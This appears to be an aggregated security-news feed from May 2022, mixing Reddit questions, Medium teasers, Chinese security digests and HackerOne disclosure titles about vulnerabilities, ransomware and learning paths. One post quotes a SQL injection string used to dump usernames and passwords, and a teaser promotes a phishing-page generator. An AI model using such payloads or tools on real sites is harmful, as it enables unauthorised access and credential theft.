    I already know I should learn C, read shellcoders handbook, ik some CTF's but idk if they're good for IOT. What I aim is to not waste any effort learning unnecessary info and most importantly to start of with something really basic and easy. Can you guys suggest me where to begin, which CTF's I should tackle, what path I should take and finally what I should avoid(a crude example ex: for people interested in b.e. of PC's they should learn about x86 instead of wasting time on mips or arm)? submitted by /u/winter-stalk [link] [comments]
  • Open

    SecWiki News 2022-05-16 Review
    网络安全创业从0到1-演讲实录 by ourren 透过俄乌冲突谈对“网络无国界”的再认识 by ourren 从网空测绘看俄乌战争态势--及对我们的启示 by ourren SecWiki周刊(第428期) by ourren (译)SLSA如何落地 by ourren MySQL安全配置基线 by SecIN社区 部分终端安全防护软件的 DNSAML 服务存在缺陷 by Avenger 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-05-16 Review
    网络安全创业从0到1-演讲实录 by ourren 透过俄乌冲突谈对“网络无国界”的再认识 by ourren 从网空测绘看俄乌战争态势--及对我们的启示 by ourren SecWiki周刊(第428期) by ourren (译)SLSA如何落地 by ourren MySQL安全配置基线 by SecIN社区 部分终端安全防护软件的 DNSAML 服务存在缺陷 by Avenger 更多最新文章,请访问SecWiki
  • Open

    UK government sits out bug bounty boom but welcomes vulnerability disclosure
    Article URL: https://portswigger.net/daily-swig/uk-government-sits-out-bug-bounty-boom-but-welcomes-vulnerability-disclosure Comments URL: https://news.ycombinator.com/item?id=31398182 Points: 2 # Comments: 0
  • Open

    Gin and Juice Shop: put your scanner to the test
    "Word". We heard that a lot of you have been having problems finding a truly dope vulnerable web application to wave your scanner at. As makers of the web's OG vulnerability scanner, we couldn't be le
  • Open

    Gin and Juice Shop: put your scanner to the test
    "Word". We heard that a lot of you have been having problems finding a truly dope vulnerable web application to wave your scanner at. As makers of the web's OG vulnerability scanner, we couldn't be le
  • Open

    A Look Into Public Clouds From the Ransomware Actor's Perspective
    Ransomware in public clouds is rare, but cloud threat actors could adapt their TTPs to be more cloud native. Now is the time to get ahead of it. The post A Look Into Public Clouds From the Ransomware Actor's Perspective appeared first on Unit42.
  • Open

    Module-1 | Introduction -Pentesting & Bypassing AWS/Azure/GCP Cloud WAF Fun & Profit
    No content preview
  • Open

    Module-1 | Introduction -Pentesting & Bypassing AWS/Azure/GCP Cloud WAF Fun & Profit
    No content preview
  • Open

    Module-1 | Introduction -Pentesting & Bypassing AWS/Azure/GCP Cloud WAF Fun & Profit
    No content preview
  • Open

    2022年中汽数据信息安全团队招聘信息
    中汽数据有限公司招聘三名工程师。
    安全业务视角下如何解决终端勒索威胁 | FreeBuf甲方社群直播回顾
    5月12日,某企业安全架构师李宗晖在FreeBuf甲方社群第三场内部直播中担任主讲嘉宾,向大家分享安全业务视角下如何解决终端勒索威胁。
    黑客正在利用Zyxel防火墙和VPN中的关键漏洞
    该漏洞会影响企业的 Zyxel防火墙和VPN设备。
    亲俄黑客攻击意大利政府网站
    一个名为“Killnet”的亲俄黑客团伙对多个意大利机构网站发动了攻击,其中包括参议院、国家卫生研究院,国家汽车协会。
    链家IT管理员删除数据库,被判7年有期徒刑
    链家一员工因登录公司系统并删除公司数据,被判处 7 年有期徒刑。
    SonicWall:请立即修复SMA 1000 漏洞
    SonicWall指出,攻击者可以利用这些漏洞绕过授权,并可能破坏易受攻击的设备。
    Linux内网渗透(三)—Linux提权
    本文是Linux内网渗透的第二篇文章——**Linux提权*
    Sysrv 僵尸网络新变种正攻击 Windows及Linux 服务器
    Sysrv 僵尸网络的新变种Sysrv-K,正在利用 Spring Framework 和 WordPress 中的漏洞,在易受攻击的 Windows 和 Linux 服务器上和部署加密恶意软件。
  • Open

    从网空测绘看俄乌战争态势及对我们的启示
    作者:杨冀龙 公众号:神龙叫 原文链接:https://mp.weixin.qq.com/s/HLvydDDhTfxK-xWsGEuCpA 通过对战争发动前后,俄乌互联网空间测绘数据分析,可以从一个侧面一窥俄乌实体战争态势情况,也能更详细窥视网空对抗情况。 一、战争前期俄罗斯网空防御居于劣势 通过网空测绘显示,俄罗斯网络空间最近一年互联网IP的开放端口暴露数量为:8609万,乌克兰为516...
  • Open

    从网空测绘看俄乌战争态势及对我们的启示
    作者:杨冀龙 公众号:神龙叫 原文链接:https://mp.weixin.qq.com/s/HLvydDDhTfxK-xWsGEuCpA 通过对战争发动前后,俄乌互联网空间测绘数据分析,可以从一个侧面一窥俄乌实体战争态势情况,也能更详细窥视网空对抗情况。 一、战争前期俄罗斯网空防御居于劣势 通过网空测绘显示,俄罗斯网络空间最近一年互联网IP的开放端口暴露数量为:8609万,乌克兰为516...
  • Open

    RedTeam Physical Tools
    Red Team Toolkit — A curated list of tools that are commonly used in the field for Physical Security, Red Teaming, and Tactical Covert… Continue reading on Medium »

  • Open

    Zphisher — Gerador de Phishing
    A Zphisher é uma ferramenta que permite a geração de páginas falsas com o objetivo de obter usuários e senhas. Continue reading on 100security »
    Why I love using NMAP
    Whether you’re in the Information Security industry,played Capture The Flags competitions or maybe you’re just someone that likes Cyber… Continue reading on Medium »
    Best YouTube Channels for Learning Cyber Security
    Best YouTube Channels for learning Cyber Security- Continue reading on Medium »
    Bug bounties, The glamour.
    Hello to the readers, it’s been a while since i wrote on medium and today this morning i feel like writing something out after analysing… Continue reading on Medium »
    Why enumerate folders and files - A valuable simple technic
    The enumeration technique is used to recognize the target environment to obtain information about files or folders that exists on a web… Continue reading on Medium »
  • Open

    X — the Pornographic Gorefest That is Neither
    A lesser A24 has much to offer in theme and thesis, but it’s got no meat on the bones. Continue reading on The Movie Chaser »
  • Open

    Using Stolen IAM Credentials - Hacking The Cloud
    submitted by /u/RedTermSession [link] [comments]
    MITM_Intercept: A little less hackish way to intercept and modify non-HTTP protocols through Burp & others.
    submitted by /u/jat0369 [link] [comments]
  • Open

    us military…..like everything
    Yes it’s not quite an OD….BUT!…. Yes it’s interesting af And I felt like I would be Sinning if I didn’t share this. https://www.militarynewbie.com/military-manuals/ submitted by /u/Salty_Ad_69 [link] [comments]
    Anybody got all of Black Clover on gdrive?
    submitted by /u/Left_Command_9458 [link] [comments]
  • Open

    Internet devices in country domain
    How to search for specific IOT devices or firewalls, filtered by country domain, region or locality? It occurs to me that I could extract information from SSL certificates, or things like that. Has anyone made a similar script that could be useful to me? submitted by /u/N0xFE [link] [comments]
    OpenVPN help
    Hello all I have an IT Security interview in the next few weeks for a graduate role and I will have to use OpenVPN to access applications. I’ve never done this before so how can I prepare for this? Thank you everyone submitted by /u/Appreciatingthegoods [link] [comments]
    OTP brute force in Zap
    So I am trying to do a lab on portswigger. But the payload that I want to give is not working as it starts from 999 and goes till 9999. So it is essentially missing the 0xxx type of OTPs. How to achieve this?? submitted by /u/Full_Albatross_5636 [link] [comments]
    Securing family network
    My parents used a very weak password for both our wifi and control panel, so obviously I changed those. I also disabled UPnP as it seems that's another point of vulnerability. What else can I do to tighten up security? submitted by /u/Able-Board-503 [link] [comments]
  • Open

    SQLI-Introduction
    Most modern web applications utilize a database structure on the back-end. Such databases are used to store and retrieve data related to… Continue reading on Medium »
    Create Your Ultimate Bug Bounty Automation Without Nerdy Bash Skills (Part 3)
    In the previous article details regarding syntax, variables, and their usage was conveyed. This Final Part Will be about the Installation… Continue reading on InfoSec Write-ups »
    Create Your Ultimate Bug Bounty Automation Without Nerdy Bash Skills (Part 3)
    In the previous article details regarding syntax, variables, and their usage was conveyed. This Final Part Will be about the Installation… Continue reading on Medium »
    Create Your Ultimate Bug Bounty Automation Without Nerdy Bash Skills (Part 1)
    Hey everyone, I hope you all are doing well. I have been Programming in multiple languages for some time now, so I thought Writing Bash… Continue reading on InfoSec Write-ups »
    Create Your Ultimate Bug Bounty Automation Without Nerdy Bash Skills (Part 1)
    Hey everyone, I hope you all are doing well. I have been Programming in multiple languages for some time now, so I thought Writing Bash… Continue reading on Medium »
    How I managed to take over any account visits my profile with Stored XSS
    Hello everybody, today we have a simple Stored XSS vulnerability that leads to stealing cookies and Taking over the account. Let’s start Continue reading on Medium »
    كتاب صائد الثغرات: خارطة الطريق لتصبح صائد ثغرات أمنية
    يقال “اعمل ما تحب، ولن تشعر أنك تعمل بعد الآن”… فمن النصائح المعروفة لتبدع في عملك وتتسلى وتكسب الأموال في نفس الوقت هي أن تعمل ما تحب؛… Continue reading on Medium »
    Bug bounties, The glamour.
    Hello to the readers, it’s been a while since i wrote on medium and today this morning i feel like writing something out after analysing… Continue reading on Medium »
    How to find vulnerable websites to SQL-Injection vulnerability in real life
    In this writeup you will learn how real hackers find vulnerable websites to SQL-Injection vulnerability to perform this web application… Continue reading on Medium »
  • Open

    Computer Forensics Tools | Kroll Artifact Parser and Extractor | TryHackMe KAPE
    submitted by /u/MotasemHa [link] [comments]
    GIAC GCFE QUESTIONS
    Are the workbooks (exercises) necessary to index? submitted by /u/ScruffyBlackFables [link] [comments]
    Does law enforcement always use digital forensics for devices or drives seized as evidence?
    See title. submitted by /u/bmiller8675 [link] [comments]
  • Open

    SecWiki News 2022-05-15 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-05-15 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    كيفية استفادة شركات الأعمال التجارية من تقنيات الاستخبارات مفتوحة المصدر
    Use of OSINT in business Continue reading on Medium »
    SPY NEWS: 2022 — Week 19
    Summary of the espionage-related news stories for the Week 19 (8–14 May) of 2022. Continue reading on Medium »
  • Open

    [sqli-lab教程】less-1
    sqli-lab教程分享学习。
    织梦后台审计
    织梦后台可以直接上传文件,或者上传zip文件。
  • Open

    Origin IP found, WAF Cloudflare Bypass
    SMTP2GO BBP disclosed a bug submitted by mrrobot2050: https://hackerone.com/reports/1536299 - Bounty: $100

  • Open

    "Zero-Days" Without Incident - Compromising Angular via Expired npm Publisher Email Domains
    submitted by /u/mandatoryprogrammer [link] [comments]
    Three ways to hack an ATM
    submitted by /u/DiabloHorn [link] [comments]
    Exploiting a Use-After-Free for code execution in every version of Python 3
    submitted by /u/DOTheLOGA [link] [comments]
    Reverse engineering Flutter apps
    submitted by /u/lmpact_ [link] [comments]
  • Open

    Best way to capture RAM from an Android device ?
    Research based so not worried about being forensically sound. I’ve tried LiME but couldn’t get the compile to work. submitted by /u/Flxtcha [link] [comments]
    View jpg files using linux sleuth kit
    Made a smiliar post a few days back but wasn't very clear with my question so I will give it one more try. I have a school exercise where we are using sleuth kit in kali to find information about a USB image that we created using dd. Now in this excerise there is a question saying, "what does picture19.jpg represent?" So basically I have to type a command that opens up the picture and shows me it, but I don't know which one. I have the inode number, so I tried icat -o but it's just giving me lots of text as output. So what command should I be using instead to view a jpg picture for example? Hope it was more clear this time! Thanks! submitted by /u/ahmedmourad22 [link] [comments]
  • Open

    War in Ukraine / May 13
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
  • Open

    Navigate through but have a look at the Tarot directory!!
    http://80.56.13.139/arc/Miscellaneous/Alternative%20religions%20and%20beliefs/Tarot/ submitted by /u/Appropriate-You-6065 [link] [comments]
    Moldova's ProTV news reports
    u/ODCrawler https://pl.uniflor.biz/ProTV/ Contains several .mp4 with news reports from ProTV in Chisinau, Moldova. submitted by /u/vjandrea [link] [comments]
    Official Hewlett Packard Drivers for Printers
    submitted by /u/Mr_Brightstar [link] [comments]
    British Canoeing
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    Domain Persistence: Silver Ticket Attack
    Introduction Benjamin Delpy (the creator of mimikatz) introduced the silver ticket attack in Blackhat 2014 in his abusing Kerberos session. Silver tickets are forged service The post Domain Persistence: Silver Ticket Attack appeared first on Hacking Articles.
    Domain Persistence: Silver Ticket Attack
    Introduction Benjamin Delpy (the creator of mimikatz) introduced the silver ticket attack in Blackhat 2014 in his abusing Kerberos session. Silver tickets are forged service The post Domain Persistence: Silver Ticket Attack appeared first on Hacking Articles.
  • Open

    Credential leak on redirect
    curl disclosed a bug submitted by iylz: https://hackerone.com/reports/1568175
    Disclose STUFF member name and make actions.
    Shopify disclosed a bug submitted by zambo: https://hackerone.com/reports/968174 - Bounty: $500
    Disclose customer orders details by shopify chat application.
    Shopify disclosed a bug submitted by zambo: https://hackerone.com/reports/968165 - Bounty: $2500
    Public Postman Api Collection Leaks Internal access to https://assets-paris-dev.codefi.network/
    Consensys disclosed a bug submitted by polem4rch: https://hackerone.com/reports/1523651 - Bounty: $500
    Download full backup [Mtn.co.rw]
    MTN Group disclosed a bug submitted by ibrahimatix0x01: https://hackerone.com/reports/1516520
  • Open

    Red Teaming
    Red Teaming is a simulation of a real attacker’s activity that is based on the most up-to-date knowledge regarding risks that are relevant… Continue reading on Medium »
    Cybersecurity Skill
    Équipe rouge de cybersécurité contre équipe bleue — Principales différences expliquées Continue reading on Medium »
    SearchMap Information Collection Tool
    Searchmap is a comprehensive information collection tool for pre-penetration testing that integrates domain name resolution, IP reverse… Continue reading on Medium »
  • Open

    Easy to find vulnerabilities that might get paid [part-1]
    Hello everyone It’s me Sankalpa Baral a noob hacker from Nepal hope you all are doing great stuff I am back after a long time so today I… Continue reading on Medium »
    My New Discovery In Oracle E-Business Login Panel That Allowed To Access For All Employees…
    Hay Hunters , Hello Infosec Community Continue reading on Medium »
    Does ms15–034 still exist today ?
    Hi everyone how are you?, I hope you guys are well. I’m RyuuKhagetsu, this is my article in English, sorry if there are any mistakes. I… Continue reading on Medium »
  • Open

    SecWiki News 2022-05-14 Review
    CVE-2022-21907 http协议远程代码执行漏洞分析总结 by ourren CVE-2021-34535 RDP客户端漏洞分析 by ourren 前端JS攻防对抗 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-05-14 Review
    CVE-2022-21907 http协议远程代码执行漏洞分析总结 by ourren CVE-2021-34535 RDP客户端漏洞分析 by ourren 前端JS攻防对抗 by ourren 更多最新文章,请访问SecWiki
  • Open

    X (2022) Review — Oposição e proximidade
    Ti West tem muito tato com o horror, seus trabalhos não partem de um lugar muito irreconhecível e sempre mostram algo peculiar sobre o… Continue reading on Medium »
  • Open

    How universal is LogRhythm?
    Basically I’m just starting to look into wanting to be a soc analyst. I am getting my sec + rn, work a basic lvl it job trying to get a bit of exp under my belt and have an associates in IT but am planning on going back to get my ba (I’m only 22). I’ve been reading a lot of Reddit posts from here and career questions when I’m bored and I’ve been seeing a lot of things talking about trying to practice LogRhythm. Is it important to practice it for every soc job or does every company use different programs. I ask because it seems super interesting and if it can give me a boost in the field, I’d hop right on learning about it. This could be a very dumb question but I’m still relatively new so cut me some slack lol submitted by /u/Spirtedgems [link] [comments]
    Incidents to look out for in http log files
    As part of a university assignment Ed I’ve been conducted the task of analysing some log files with Splunk to find any incidents on the organisation’s network. What should I be looking out for? How can I tell if their’s a potential attack on the system such as a phishing or malware? submitted by /u/fgtethancx [link] [comments]
    Threat Intelligence at your org
    I have to write a plan for our organization to do threat intelligence. It's for compliance but we should really start doing something. At the moment, were looking at a system to automatically gather file hashes, IPs, etc and put them in our firewalls and other devices. We're also looking at a once a month briefing to our C-suite. What are you doing? submitted by /u/Odd-Kale2587 [link] [comments]
  • Open

    Zyxel silently patches command-injection vulnerability with 9.8 severity rating
    Article URL: https://arstechnica.com/information-technology/2022/05/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating/ Comments URL: https://news.ycombinator.com/item?id=31376372 Points: 5 # Comments: 0
  • Open

    关于大型互联网企业DevSecOps体系构建的总结与思考
    最近几年随着软件供应链攻击和数据安全事件的频繁出现,企业面临着重大的软件供应链安全和数据泄露风险,这间接促使了 … 继续阅读关于大型互联网企业DevSecOps体系构建的总结与思考 →
    云上攻防二三事(续)
    云上攻防系列其实早在几年前笔者就公开分享过一些思路,有兴趣的可以看看Red Teaming for Cloud … 继续阅读云上攻防二三事(续) →

  • Open

    Hacking: The Art Of Exploitation
    When studying from this book, am I supposed to learn how every code sample works from scratch or only copy paste it and learn about its purpose and functions from the author? So far I've been rewriting every sample from scratch and making sure I'm understanding it, but at the same time I'm moving too slow and was wondering if that's even the correct approach. submitted by /u/Majestic_Ideal9833 [link] [comments]
  • Open

    Is there any alternative/competitor to DBprotect?
    Im not a trustwave fan BUT, that product is excellent at what it does. Im wondering if there is an alternative to it. I know IBM has guardium, and ive used it and it is complete garbage. Plus its really made for constant DB monitoring not pen test style testing/auditing like DBprotect is. submitted by /u/networkalchemy [link] [comments]
    What is the best password manager for me?
    I was talking to a friend regarding password security and they sort of explained password managers. I of course knew they existed, but didn't know there were different kinds. According to my friend, they were roughly divided into three: manual backup, cloud backup and internet sync. My question would be which kind (and which one soecifically) would be best suited for me? I live in a city that is insecure and journalists and researchers are constantly targeted. I am afraid I could get either caught by law enforcement (not because what I do is illegal per se, but authority abuse is ripe here) or hacked by someone and have my data erased. What would you recommend for someone in my situation? submitted by /u/marypine [link] [comments]
    Is drozer still relevant for mobile pentest?
    Does anyone still use drozer for mobile pentest nowadays? I've just checked it's github page https://github.com/FSecureLABS/drozer and found that the development had been stopped. We would like to formely announce that F-Secure has stopped further development of the drozer tool. I tried the docker image and having connection refused issue, not sure what is going on. submitted by /u/w0lfcat [link] [comments]
    Bad Experiences Working With BitSight?
    Does anyone have any negative BitSight experiences to share from dealing with them at their companies? I'll go first; their paid service is worthless, their "findings" are filled with false positives, and you have to divert resources to get the score up for underwriter optics, which has nothing to do with improving your actual security posture. I really don't know how they're allowed to legally operate, it's extortion. submitted by /u/Memerkitty [link] [comments]
    tricky python code
    Hi, why does this script shows All our secrets!!! 😨 😩 😱 2 times ??? What makes me lost why passing False value gave us the same message ??? ``` class User: """system user""" def __init__(self, trusted=False): self.trusted = trusted def can_login(self): """only let's trusted friends read secrets""" return self.trusted def login(user): """Gives access to users with privilages.""" if user.can_login: print("All our secrets!!! 😨 😩 😱") else: print("No secrets for you!") hacker = User(trusted=False) friend = User(trusted=True) login(hacker) login(friend) ``` submitted by /u/Spare_Prize1148 [link] [comments]
    Hi, code injection help please
    Hi, I'm typing 1' or ‘1’=’1 in the search box when trying to find all the persons, usernames and passwords in the database. But I get the following error message: ​ There was error in your query: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1 ​ The Server version is : Apache/2.4.41 (Ubuntu) and I found that is version MariaDB-5.5.41 ​ How can find the right syntax? ​ Thanks submitted by /u/Traditional_Bird_877 [link] [comments]
  • Open

    Understanding Data Sources and File Formats
    Following on the heels of my previous post regarding file formats and sharing the link to the post on LinkedIn, I had some additional thoughts that would benefit greatly from not blasting those thoughts out as comments to the original post, but instead editing and refining them via this medium. My first thought was, is it necessary for every analyst to have deep, intimate knowledge of file formats? The answer to that is a resounding "no", because it's simply not possible, and not scalable. There are too many possible file formats for analysts to be familiar with; however, if a few knowledgeable analysts, ones who understand the value of the file format information to DFIR, CTI, etc., document the information and are available to act as resources, then that should suffice. With the format a…
  • Open

    error parse uri path in curl
    curl disclosed a bug submitted by iylz: https://hackerone.com/reports/1566462
    Memory leak in CURLOPT_XOAUTH2_BEARER
    curl disclosed a bug submitted by pappacoda: https://hackerone.com/reports/1567257
    Cookie injection from non-secure context
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1560324
    [Java] CWE-016: Query to detect insecure configuration of Spring Boot Actuator
    GitHub Security Lab disclosed a bug submitted by luchua: https://hackerone.com/reports/1137966 - Bounty: $500
    [CPP]: Add query for CWE-754: Improper Check for Unusual or Exceptional Conditions when using functions scanf
    GitHub Security Lab disclosed a bug submitted by ihsinme: https://hackerone.com/reports/1549073 - Bounty: $1800
    [Java]: CWE-552 Add sources and sinks to detect unsafe getResource calls in Java EE applications
    GitHub Security Lab disclosed a bug submitted by luchua: https://hackerone.com/reports/1564099 - Bounty: $1800
    [CPP]: Add query for CWE-190: Integer Overflow or Wraparound when using transform after operation
    GitHub Security Lab disclosed a bug submitted by ihsinme: https://hackerone.com/reports/1564100 - Bounty: $500
    [Java]: CWE-321 - Query to detect hardcoded JWT secret keys
    GitHub Security Lab disclosed a bug submitted by luchua: https://hackerone.com/reports/1567588 - Bounty: $1800
  • Open

    Docker Containers Security Series
    submitted by /u/tbhaxor [link] [comments]
  • Open

    Tom & Jelly - Google Drive video's movie
    submitted by /u/damschreeuwer [link] [comments]
    OtherPeople - Google Drive
    submitted by /u/damschreeuwer [link] [comments]
  • Open

    PowerShell Scripts used to run malicious shellcode. Reverse Shell vs Bind Shell
    submitted by /u/CyberMasterV [link] [comments]
    Hunting evasive vulnerabilities
    submitted by /u/0xdea [link] [comments]
  • Open

    War in Ukraine / May 12
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    A Chasing Scene From Tenet — An OSINT Geo Location Challenge
    Where’s the car? Continue reading on Medium »
    Cool OSINT tools you can use to gather information about a target
    Today I will go over some basic OSINT tools you should know about if you want to gather information about a target. So let’s get started! Continue reading on System Weakness »
    Membuka Konten Halaman Web Lama atau Menelusuri Arsip Internet (yang udah kehapus)
    Terkadang seorang Auditor dalam upaya pengumpulan data dan informasi dari internet, kita perlu mengunjungi kembali halaman web untuk… Continue reading on Medium »
  • Open

    RedTeam and Penetration Testing Checklist
    Red Teaming and Penetration Testing Checklist, Cheatsheet, Clickscript Continue reading on Medium »
    What I learned after hacking my first 20 boxes from Hack the Box…
    This Post is for Beginners from a Beginner’s perspective. Continue reading on Medium »
  • Open

    SecWiki News 2022-05-13 Review
    从ATT&CK V11版发布看ATT&CK的更新历程 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-05-13 Review
    从ATT&CK V11版发布看ATT&CK的更新历程 by ourren 更多最新文章,请访问SecWiki
  • Open

    MFA (Multi-Factor Authentication)
    Multi-factor authentication is when you use two or more authentication. factors to verify your identity. These factors include Something… Continue reading on Medium »
    Announcing Pay At Triage for Bug Bounty
    By John Turner, Staff Security Technologist & Vinay Venkateswara Rao, Senior Security Technologist Continue reading on Uber Privacy & Security »
    From android app to access admin dashboard
    One of easy and interesting vulnerability that I found and lead to access admin dashboard for company (internal system) : Continue reading on Medium »
    [Bug Bounty] Sql Injection and Bypass Sql Login
    Hi Semuanya bagaimana kabarnya ?, semoga dalam keadaan baik baik saja. Kali ini saya ingin membagikan tulisan saya mengenai bug bounty dan… Continue reading on Medium »
  • Open

    算法稳定币UST崩盘—是完美风暴还是金融围猎?
    原去中心化金融世界的第二大经济体Terra在这场史无前例的加密风暴中彻底失败。
    掌数信息:贴合传媒业务安全解决方案的四个难点 | 网安新势力SOLO发布季
    传媒行业的安全需求更关注哪些方面?有哪些安全场景?需要什么安全产品?
    疑似伊朗APT34 使用新后门针对约旦政府发起新一轮攻击
    Malwarebytes 发现一封针对约旦外交部官员进行攻击的恶意邮件,经分析该攻击来源于疑似与伊朗有关的攻击组织 APT 34。
    首发!《证券期货业网络安全管理办法(征求意见稿)》解读
    2022年4月29日,中国证监会就《证券期货业网络安全管理办法(征求意见稿)》公开征求意见。
    FreeBuf早报 | 游戏巨头暴雪再遭DDoS攻击;加拿大空军关键供应商遭勒索攻击
    全球最大的游戏开发商和发行商动视暴雪在推特上表示,其战网服务正遭受 DDoS 攻击。
    【弈合规周课堂】深度!高频通报问题之App强制、频繁、过度索取用户权限
    当前,App为实现业务功能所需,申请和使用系统权限并收集个人信息成为常态。
    渗透测试-文件上传漏洞
    件上传漏洞,字如其意,就是可能出现在一切允许上传文件的功能点。
    FreeBuf甲方群话题讨论 | 聊聊软件供应链安全及SCA技术实践
    SCA是不是应对供应链安全的最佳手段?在实际应用中还有哪些缺点?SCA与SAST等工具该如何选择?
    浅谈LAPSUS$防范那些事儿
    最近几个月,一个名为LAPSUS$的网络犯罪团伙可谓风头无两。
    大规模黑客活动破坏了数千个WordPress网站
    该活动通过在WordPress网站注入恶意JavaScript代码将访问者重定向到诈骗内容。
    勒索软件Pandora(潘多拉)样本分析报告
    主要通过钓鱼邮件、漏洞利用、RDP爆破等方式进行传播,采用Raas双重勒索的策略
    FreeBuf周报 | 勒索软件REvil 回归;哥斯达黎加因Conti攻击进入紧急状态
    勒索软件REvil 回归,新版本正在积极开发中;大规模黑客活动破坏了数千个WordPress网站。
    ElasticSearch服务器配置错误,暴露579GB用户网站记录
    两台配置错误的 ElasticSearch 服务器共暴露了约3.59(359019902)亿条记录。
    既能挖矿还能勒索,Eternity 恶意软件工具包正通过Telegram传播
    这个模块化的工具包包括了信息窃取器、挖矿器、剪切板、勒索软件程序、蠕虫传播器,以及即将上线的 DDoS攻击机器人,其中的每一个模块都单独购买。
  • Open

    前端 JS 攻防对抗
    作者:深信服千里目安全实验室 原文链接:https://mp.weixin.qq.com/s/QbfUkU0Fj7Bjk--21H2UQA 简介 网络爬虫一直以来是让网站维护人员头痛的事情,即要为搜索引擎开方便之门,提升网站排名、广告引入等,又要面对恶意爬虫做出应对措施,避免数据被非法获取,甚至出售。因此促生出爬虫和反爬虫这场旷日持久的战斗。 爬虫的开发从最初的简单脚本到PhantomJs、...
    CVE-2022-21907 http协议远程代码执行漏洞分析总结
    作者:yyjb@360高级攻防实验室 原文链接:http://noahblog.360.cn/cve-2022-21907-httpxie-yi-yuan-cheng-dai-ma-zhi-xing-lou-dong-fen-xi-zong-jie/ 背景: 2021年最近的上一个http远程代码执行漏洞CVE-2021-31166中,由于其UAF的对象生命周期的有限性,似乎并不太可能在实际...
    CVE-2021-34535 RDP客户端漏洞分析
    作者:yyjb@360高级攻防实验室 原文链接:http://noahblog.360.cn/cve-2021-34535-rdpke-hu-duan-lou-dong-fen-xi/ 背景: 2021年的八月份微软补丁日,微软公布的补丁中包含两个我们比较感兴趣的两个RCE漏洞中,另一个是cve-2021-34535 RDP客户端的代码执行漏洞。在现代windows系统中,RDP客户端不仅仅...
    CVE-2021-26432 NFS ONCRPC XDR 驱动协议远程代码执行漏洞验证过程
    作者:yyjb@360高级攻防实验室 原文链接:http://noahblog.360.cn/untitled-2/ 背景 2021年8月份有两个较严重的漏洞需要关注,其中包括NFS ONCRPC XDR Driver 远程代码执行漏洞CVE-2021-26432以及RDP客户端远程代码执行漏洞CVE-2021-34535。 我们的目标是分析这些潜在影响可能较大的漏洞是否容易在实际的场景中被...
  • Open

    前端 JS 攻防对抗
    作者:深信服千里目安全实验室 原文链接:https://mp.weixin.qq.com/s/QbfUkU0Fj7Bjk--21H2UQA 简介 网络爬虫一直以来是让网站维护人员头痛的事情,即要为搜索引擎开方便之门,提升网站排名、广告引入等,又要面对恶意爬虫做出应对措施,避免数据被非法获取,甚至出售。因此促生出爬虫和反爬虫这场旷日持久的战斗。 爬虫的开发从最初的简单脚本到PhantomJs、...
    CVE-2022-21907 http协议远程代码执行漏洞分析总结
    作者:yyjb@360高级攻防实验室 原文链接:http://noahblog.360.cn/cve-2022-21907-httpxie-yi-yuan-cheng-dai-ma-zhi-xing-lou-dong-fen-xi-zong-jie/ 背景: 2021年最近的上一个http远程代码执行漏洞CVE-2021-31166中,由于其UAF的对象生命周期的有限性,似乎并不太可能在实际...
    CVE-2021-34535 RDP客户端漏洞分析
    作者:yyjb@360高级攻防实验室 原文链接:http://noahblog.360.cn/cve-2021-34535-rdpke-hu-duan-lou-dong-fen-xi/ 背景: 2021年的八月份微软补丁日,微软公布的补丁中包含两个我们比较感兴趣的两个RCE漏洞中,另一个是cve-2021-34535 RDP客户端的代码执行漏洞。在现代windows系统中,RDP客户端不仅仅...
    CVE-2021-26432 NFS ONCRPC XDR 驱动协议远程代码执行漏洞验证过程
    作者:yyjb@360高级攻防实验室 原文链接:http://noahblog.360.cn/untitled-2/ 背景 2021年8月份有两个较严重的漏洞需要关注,其中包括NFS ONCRPC XDR Driver 远程代码执行漏洞CVE-2021-26432以及RDP客户端远程代码执行漏洞CVE-2021-34535。 我们的目标是分析这些潜在影响可能较大的漏洞是否容易在实际的场景中被...
  • Open

    Nuclei – Community Powered Vulnerability Scanner
    Article URL: https://nuclei.projectdiscovery.io/ Comments URL: https://news.ycombinator.com/item?id=31364433 Points: 1 # Comments: 0

  • Open

    Harmful Help: Analyzing a Malicious Compiled HTML Help File Delivering Agent Tesla
    We analyze a malicious compiled HTML help file delivering Agent Tesla, following the chain of attack through JavaScript and multiple stages of PowerShell. The post Harmful Help: Analyzing a Malicious Compiled HTML Help File Delivering Agent Tesla appeared first on Unit42.
  • Open

    CVE-2022-27778: curl removes wrong file on error
    Internet Bug Bounty disclosed a bug submitted by nyymi: https://hackerone.com/reports/1565623 - Bounty: $2400
    CVE-2022-27782: TLS and SSH connection too eager reuse
    Internet Bug Bounty disclosed a bug submitted by nyymi: https://hackerone.com/reports/1565624 - Bounty: $2400
    [CVE-2020-3452] Unauthenticated file read in Cisco ASA
    U.S. Dept Of Defense disclosed a bug submitted by ghostxsec: https://hackerone.com/reports/1555015
    [CVE-2020-3452] Unauthenticated file read in Cisco ASA
    U.S. Dept Of Defense disclosed a bug submitted by ghostxsec: https://hackerone.com/reports/1555021
    CVE-2020-3187 - Unauthenticated Arbitrary File Deletion
    U.S. Dept Of Defense disclosed a bug submitted by ghostxsec: https://hackerone.com/reports/1555027
    CVE-2020-3187 - Unauthenticated Arbitrary File Deletion
    U.S. Dept Of Defense disclosed a bug submitted by ghostxsec: https://hackerone.com/reports/1555025
    SQL Injection on https:///
    U.S. Dept Of Defense disclosed a bug submitted by cdl: https://hackerone.com/reports/232378
    SQL Injection on
    U.S. Dept Of Defense disclosed a bug submitted by cdl: https://hackerone.com/reports/277380
    Storage of old passwords in plain text format
    Recorded Future disclosed a bug submitted by subuganz: https://hackerone.com/reports/1549217 - Bounty: $750
  • Open

    B1txor20 Malware Exploiting Log4j Vulnerability
    Article URL: https://socradar.io/b1txor20-malware-exploiting-log4j-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=31358378 Points: 1 # Comments: 1
  • Open

    AI Can Write Code Like Humans — Bugs and All
